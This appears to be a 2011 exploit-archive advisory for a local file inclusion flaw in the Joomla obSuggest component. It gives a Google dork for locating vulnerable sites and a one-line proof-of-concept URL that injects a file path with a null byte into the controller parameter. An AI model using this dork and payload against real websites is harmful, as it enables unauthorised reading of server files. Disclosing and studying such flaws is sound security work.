Home / exploits Joomla obSuggest Local File Inclusion
Posted on 31 July 2011
) ) ) ( ( ( ( ( ) ) ( /(( /( ( ( /( ( ( ( ) )) ) ) )) ) ) ) ( /( ( /( )())())) ) )()) ) ) ) (()/(()/( ( (()/(()/((()/( )()) )()) ((_)((_)(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) ) /(_))(_))/(_))(_)|((_)\n__ ((_)((_)/(_))___ ((_) _ ) )\___) _ )(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_) / / _ (_)) __ / (_)_(_)(/ __(_)_(_) _ | | __| _ | |_ _|| | | |/ / V / (_) || (_ | V / / _ | (__ / _ | /| |) | _|| / |__ | | | .` | ' < |_| \___/ \___| |_| /_/ \_ \___/_/ \_|_|_|___/|___|_|_\____|___||_|\_|_|\_\n.WEB.ID ----------------------------------------------------------------------- Joomla Component obSuggest Local File Inclusion Vulnerability Author : v3n0m Discovered : July, 31-2011 GMT +7:00 Jakarta, Indonesia Software : obSuggest - Uservoice for Joomla Developer : http://foobla.com/ License : GPLv2 or later Tested On : Joomla 1.5.x Dorks : inurl:com_obsuggest ----------------------------------------------------------------------- Proof of Concept: ---------------- http://127.0.0.1/[path]/index.php?option=com_obsuggest&controller=[LFI]%00 Credits: ------- www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id
